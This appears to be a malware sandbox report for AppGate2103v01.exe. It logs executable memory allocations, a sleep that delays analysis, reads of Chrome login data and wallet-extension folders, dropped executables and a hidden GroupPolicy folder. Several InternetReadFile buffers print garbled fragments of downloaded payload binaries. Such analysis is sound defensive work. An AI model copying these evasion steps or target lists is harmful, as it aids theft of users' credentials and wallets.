base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b3a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00dea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00deb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00dec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ded000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00dee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04de0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04de1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ded000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cc4000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04def000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description AppGate2103v01.exe tried to sleep 265 seconds, actually delayed analysis time by 265 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
domain ipinfo.io
file C:\Users\test22\Documents\SimpleAdobe\_8yuL8qjJtP5NZqy7PzNyVXU.exe
file C:\Users\test22\Documents\SimpleAdobe\o_CeSdAw1K73YQlvgMMzEXT2.exe
file C:\Users\test22\Documents\SimpleAdobe\4Ko_aC6s3slEKqtxKW0CJGYX.exe
file C:\Users\test22\Documents\SimpleAdobe\HV0uZnmSdVHbUO7nRUiZwFU8.exe
file C:\Users\test22\Documents\SimpleAdobe\JLVgQHE0e3zqt0CoYzevdDqB.exe
file C:\Users\test22\Documents\SimpleAdobe\vE9E4cuoYSHSDzLpSZTsGcKe.exe
file C:\Users\test22\Documents\SimpleAdobe\ivWgK3rxWR3mMHVNHWY3ae5i.exe
file C:\Users\test22\Documents\SimpleAdobe\phD32zk70jfeSiOlFqUzmEx4.exe
file C:\Users\test22\Documents\SimpleAdobe\ZW7uNr1lwJSS3G43lu8CBjiA.exe
file C:\Users\test22\Documents\SimpleAdobe\ueGCmF16p4IowThmgSvN3gQl.exe
file C:\Users\test22\Documents\SimpleAdobe\Eek13wjutSlE27l5yJOzFEvs.exe
Time & API Arguments Status Return Repeated

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\System32\GroupPolicy
filepath: C:\Windows\System32\GroupPolicy
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Ìý©&ˆœÇuˆœÇuˆœÇu–ÎCu¬œÇu–ÎRu›œÇu–ÎDuÿœÇu¯Z¼uœÇuˆœÆuâœÇu–ÎMu‰œÇu–ÎSu‰œÇu–ÎVu‰œÇuRichˆœÇuPELm¾2dà  àÜ{¼ð@|ÜãܝPz¸ôð|.textÌÞà `.rdataŽ¶ð¸ä@@.data|Ñw°Jœ@À.rsrc¸ôzöæ@@; °BuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; ·Bt‹ ¬¶B…Hpuè#‰‹F;°µBt‹F‹ ¬¶B…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿ|ð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿ|ð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿ|ð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hà™Bè¤3ƒeä‹u;5Tqºw"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=€ð@ƒ=,ôBuè7jèR5hÿèÎYY¡Dqºƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,ôBÿ׋؅Ûu.j ^9H÷Btÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc0098
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ Ä  @0&@`”"ÐZ°Ô CODET `DATAô' ( @ÀBSSÅ P4À.idata”"`$4@À.tlsXÀ.rdata X@P.relocÔ°Z@P.rsrcZÐZv@P0&Ð%@P@Boolean@FalseTrue@,@ WideCharÿÿD@CharÿX@Shortint€ÿÿÿp@Smallint€ÿÿÿˆ@Integer€ÿÿÿ‹À @Byteÿ´@WordÿÿÈ@ExtendedØ@Cardinalÿÿÿÿð@Int64€ÿÿÿÿÿÿÿ @Single@@Double@,@Real8@CompD@CurrencyT@ ShortStringÿ‹Àh@ByteBool€ÿÿÿd@FalseTrue‹À@WordBool€ÿÿÿŒ@FalseTrue‹À¸@LongBool€ÿÿÿ´@FalseTrue‹Àà@ Stringì@ WideStringü@ Variant@ @ OleVariantd@d@86@D6@H6@L6@@6@˜3@´3@ð3@TObjectp@TObjectd@System@ IInterfaceÀFSystemÿÿÀ@ IInvokableŒ@Systemð@ IDispatchŒ@ÀFSystemÿÿÌƒD$øé­NƒD$øéËNƒD$øéÕNÌÌ@'@1@ÀF=@@¸@I@¸@ @86@¨a@´a@L6@@6@Äa@´3@ð3@TInterfacedObject‹ÀÐ@ TBoundArray„@Systemø@ TDateT
request_handle: 0x0000000000cc0058
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Ìý©&ˆœÇuˆœÇuˆœÇu–ÎCu¬œÇu–ÎRu›œÇu–ÎDuÿœÇu¯Z¼uœÇuˆœÆuâœÇu–ÎMu‰œÇu–ÎSu‰œÇu–ÎVu‰œÇuRichˆœÇuPEL²Ñdà  àº|¼ð@p}ûJ€Ü{Pp{¸ô wXw@ð|.textÌÞà `.rdataŽ”ð–ä@@.data|Áw@z@À.tlsÍ `{ º@À.rsrc¸ôp{öÄ@@; CuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; —Ct‹ ¬–C…Hpuè#‰‹F;°•Ct‹F‹ ¬–C…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿ|ð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿ|ð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿ|ð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hàwCè¤3ƒeä‹u;5TQ»w"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=€ð@ƒ=,ÔCuè7jèR5hÿèÎYY¡DQ»ƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,ÔCÿ׋؅Ûu.j ^9H×Ctÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc0014
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $¬,3èM]EèM]EèM]EöÙEÌM]EöÈEûM]EöÞEŸM]Eϋ&EíM]EèM\EM]Eö×EéM]EöÉEéM]EöÌEéM]ERichèM]EPELíuoeà  àV|¼ð@}拁l<{ õðt.text¼Þà `.rdataâ0ð2ä@@.data|Ñw0J@À.rsrc õ{ö`@@; 0CuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; 7Ct‹ ¬6C…Hpuè#‰‹F;°5Ct‹F‹ ¬6C…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿtð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿtð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿtð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hpCè¤3ƒeä‹u;5Tñºw"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=xð@ƒ=,tCuè7jèR5hÿèÎYY¡Dñºƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,tCÿ׋؅Ûu.j ^9HwCtÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc00cc
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYˆØŒYˆØŒYˆØŒ3”ÚŒpˆØŒYˆÙŒ[ˆØŒë”ÈŒ[ˆØŒYˆØŒVˆØŒáŽÞŒXˆØŒRichYˆØŒPELˆ»‹dà  Þ²àÝ@ðG@…ŒŒààP8.textËáÞ `.rdata â@@.data¤0”þ@À.rsrcàà’@@¹€;Ù†s[Ìém[‹MˆƒÁ‰Dÿÿÿ‹Uü‹…Dÿÿÿ‰B4‹Dÿÿÿ‰4ÿÿÿé4¼‹Uü‹Pÿ 0A¶ƒé¶ÑR‹Eü‹Qÿ0A‹‰Uð‹Eð‰Eì3É…ŒéÀu+ë0Bpq‹EüƒÀ‰Eüé€,U‹ìƒì<VW‹EPèQ¯ƒÄ‰Eü‹EüƒÀX™‹È‹ò‹E™+Èò‰MøfWÀfEìÇEÜÿÿÿÿÇEà‹U܃‹EàƒÐ‰U܉Eà‹M‰MôfWÀfEäéSÇEÌéu…‹U‹Eø; ÌkMükUø‹E‹u‰Eð‰Mô‰uè‰Uì‹Mô‹Uð‹Eì‹uè‹L ;L‚b¢‡hr‹Uô‹Eð‹Mì‹uè‹T;T†B¢éIr‹Uü‹Eü‹J8+H4Áé ‹Uü¯J@‹Eü‹P4ыEü‹Mü‹@8+A4%ÿ‹Mü¯A@Áè ЉU‹Uü‹B<;E‡ÍÈDžlÿÿÿé ¸‹UèR‹E‹H\Q‹UôR‹EðPèa¦ƒÄ…À… ¥ƒÈÿéÌ5ÇEüéï8•>ºŒ4Hس‹UôR‹MüƒÁèB ¹kы ôÂF‹‰‚ÃF‹Mü‹A ‹å]Ã}ø„…)‹UøRÿ,0Aév)‹å]Ãè°%™RP‹EøP‹MôQèXléKJNé&­Ñ¦‡öá+ ø¹J]×ÈŋEüƒÀ‰Eüéj‹uì‹}ðƒçjj‹MèQ‹UäRèJ‹Mô‹3Àòø‹Eì‹Uð± èf¸ðú‰uì‰}ð‹Mð;Mà‚:h‡‹Uì;U܆(hé‹uì‹}ðƒç‹Eì‹Uð± è#¸ðú‰uì‰}ðéþgU‹ìì$èÖF‰EÜhj‹EPè¹HƒÄ è»F‰Eøƒ}ø…åy3ÀéÎSÏ]èž_ã®6•zU‹ìƒì SQè*h6ÊÛ0Pèý4‰Eôÿu ÿuè™7‹X‹H+ˉ]ü‰MøÿuÿuÿuøÿuüÿUôY[‹å]ÂÇEÀéár‹E鱎ÿ%D0AU‹ììÀDžDþÿÿÇEüë ‹EüƒÀ‰Eüƒ}üks‹MüDŽHþÿÿëáDž
request_handle: 0x0000000000cc00c0
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELõ%\fà  ÖH^ÎôH I@ €K@…€ôHKI„[`K 5ôH  H.textÔÔH ÖH `.rsrc„[I\ØH@@.reloc `K4K@B°ôHH¨¿ ˜²P@r#ê|%V+(f+.b( 8*B+(Ò]'4~þ*6+(aE~g~*Z+(x=.( 8*B+(8ó%V~þ*6+(2m4~*0Œ+(§4YN8qþ E8*s €8/s €8âÿÿÿs € 9¹ÿÿÿ& 8®ÿÿÿs € :™ÿÿÿ&8ÿÿÿs €8¶ÿÿÿ0Z+(;M þ8þ E*8%~o!  (9Òÿÿÿ&8Èÿÿÿ*8øÿÿÿ8óÿÿÿ0Z+(R­N; þ8þ E'8"~o"  (9Òÿÿÿ&8Èÿÿÿ88*0Z+(Ž&H þ8þ E'8"~o#  ( :Òÿÿÿ&8Èÿÿÿ88*0M+(PÝ{^8þ E8~o$ 8*8øÿÿÿ (9Éÿÿÿ&8¿ÿÿÿ0Z+(¡4j] þ8þ E*8%~o%  (9Òÿÿÿ&8Èÿÿÿ*8øÿÿÿ8óÿÿÿB+({']T~þ*6+(m¯hB~*0k+(UQ þ8þ E8 8883{ 8éÿÿÿ{ (+}  (:·ÿÿÿ&8­ÿÿÿ*0¡+(°8P þ8þ EM'h8H (31s& z| o+8M{ @5 (:­ÿÿÿ& 8¢ÿÿÿ8" (:ÿÿÿ&8ƒÿÿÿ9¦ÿÿÿ8‘ÿÿÿ*0-+(÷G9<Œ9þo' 9ý~ 9:~ Ð(( o) 9 J(31(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †(31 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy
request_handle: 0x0000000000cc00a0
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELE$\fà  fHH.„H  H@  K@…àƒHK H EK „ƒH  H.text4dH fH `.rsrc E HFhH@@.reloc K®J@B„HH/ ™Y È"m¶%V+(•áU( 8*B+(I)_~þ*6+(~ÆkD~*Z+(ÏÎiH( 8*B+(Àd{n~þ*6+(?rR~*0w+(&—e48!þ E#8s €8s €8s €8Óÿÿÿ*s €8s € :Ÿÿÿÿ&8•ÿÿÿ0++(» ]O8*~o! 88æÿÿÿ8áÿÿÿ0++(€M\38 88~o" 8äÿÿÿ*0&+(;J7~o# 8*8øÿÿÿ8óÿÿÿ0++(@g8*~o$ 88æÿÿÿ8áÿÿÿ0&+(DoWQ~o% 8*8øÿÿÿ8óÿÿÿB+(lÐjh~þ*6+(Üø1<~*0c+(íNc8þ E8{ (+} 8 8'8"{  (:»ÿÿÿ& 8°ÿÿÿ*0{+(}ŸgL8þ EV8Q{ @E8%* (Ê0s& z| o+8Ûÿÿÿ8Öÿÿÿ (:§ÿÿÿ&8ÿÿÿ9Ìÿÿÿ8·ÿÿÿ0-+(’ö&VŒ9þo' 9ý~ 9:~ Ð(( o) 9 J(Ê0(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †(Ê0 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy0& +(hÿ@\þo5 þ*Z+(=Ó|;(6 8*0( +(áWDn(7 (8 888*0'+(K[48 88(9 8èÿÿÿ*0& +(IV`Ð(( 8*8øÿÿÿ8óÿÿÿ0' +(¸rg8 *8øÿÿÿ8óÿÿÿ(8èÿÿÿB+(=gS~ þ*
request_handle: 0x0000000000cc004c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à ”F$›°@@€@ÐP ,ðCODED’” `DATAL°˜@ÀBSSHÀœÀ.idataP Ð œ@À.tlsà¦À.rdatað¦@P.reloc´@P.rsrc,,¨@P@Þ@P string<@m@Ä)@¬(@Ô(@)@ $)@Free0)@ InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName€(@ ClassNameIs¨(@ ClassParentÀ)@ ClassInfoø(@ InstanceSize°)@ InheritsFromÈ)@Dispatchð)@ MethodAddress<*@ MethodNamex*@ FieldAddressÄ)@DefaultHandler¬(@ NewInstanceÔ(@ FreeInstanceTObject@Í@ÿ% Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ% 